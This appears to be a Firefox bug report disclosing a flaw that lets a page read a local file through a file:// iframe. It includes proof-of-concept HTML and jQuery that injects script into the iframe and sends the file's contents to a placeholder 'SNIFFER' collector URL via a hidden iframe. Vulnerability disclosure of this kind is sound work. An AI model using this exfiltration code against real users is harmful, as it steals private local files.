Reading local file and send to gate
Created attachment 8822934
jstest.rar

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507

Steps to reproduce:

Firstly, sorry for my english.
I try get body of iframe and send to my gate.

Make iframe and try to get body of iframe and src will be local file <iframe id="frm1" width="500px" height="500px" src="file:///D:\WebServers\home\test1.ru\www\jstest\1.txt"></iframe>

$("#frm1").contents().find("body").html() //I think there will be a body

Ok... append JS code into the iframe frm1. JS code will create iframe and send document.body

<script src="https://code.jquery.com/jquery-3.0.0.min.js"></script>
	
	<script>
	$( document ).ready(function() {
	    
    var $iframe = $('#frm1');
    $iframe.ready(function() {
	    
	    var script = 'var body=document.body.innerHTML; var ifrm = document.createElement("iframe"); ifrm.setAttribute("src", "http://SNIFFER/ss.php?data="+ body); ifrm.style.width = "4px"; ifrm.style.height = "4px"; document.body.appendChild(ifrm);';
        $iframe.contents().find("body").append($('<script>').html(script));
    
	});

		 
	});



 

</script>

<body>
<iframe id="frm1" width="500px" height="500px" src="file:///D:\WebServers\home\test1.ru\www\jstest\1.txt"></iframe>
</body>






Actual results:

body of file 1.txt sent to my gate